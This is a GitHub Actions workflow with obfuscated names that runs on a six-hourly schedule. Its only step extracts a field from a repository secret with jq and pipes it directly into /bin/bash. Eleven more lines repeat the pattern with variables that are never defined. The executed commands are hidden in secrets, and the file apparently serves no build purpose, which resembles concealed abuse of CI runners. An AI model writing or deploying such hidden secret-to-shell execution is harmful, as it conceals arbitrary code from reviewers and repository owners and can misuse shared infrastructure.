name: zusanchqing
on:
  workflow_dispatch:
  schedule:
    - cron: '41 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zusanchqing
        env:
          hfst114: ${{ secrets.hfst114 }}
        run: |
          echo $hfst114 | jq -r .aoaoe425 | /bin/bash
          echo $yk926 | jq -r .y23143 | /bin/bash
          echo $chlfm49 | jq -r .ztd85988 | /bin/bash
          echo $zqbm653 | jq -r .wgenq80 | /bin/bash
          echo $hyrux0192 | jq -r .bw856 | /bin/bash
          echo $gpjm42 | jq -r .a4751 | /bin/bash
          echo $f1 | jq -r .uopfj369 | /bin/bash
          echo $ju0847 | jq -r .stbg0301 | /bin/bash
          echo $ndf8275 | jq -r .rxaky83812 | /bin/bash
          echo $vutnz56 | jq -r .j74526 | /bin/bash
          echo $dlfc2 | jq -r .t52471 | /bin/bash
          echo $xjt29242 | jq -r .ugxki67760 | /bin/bash

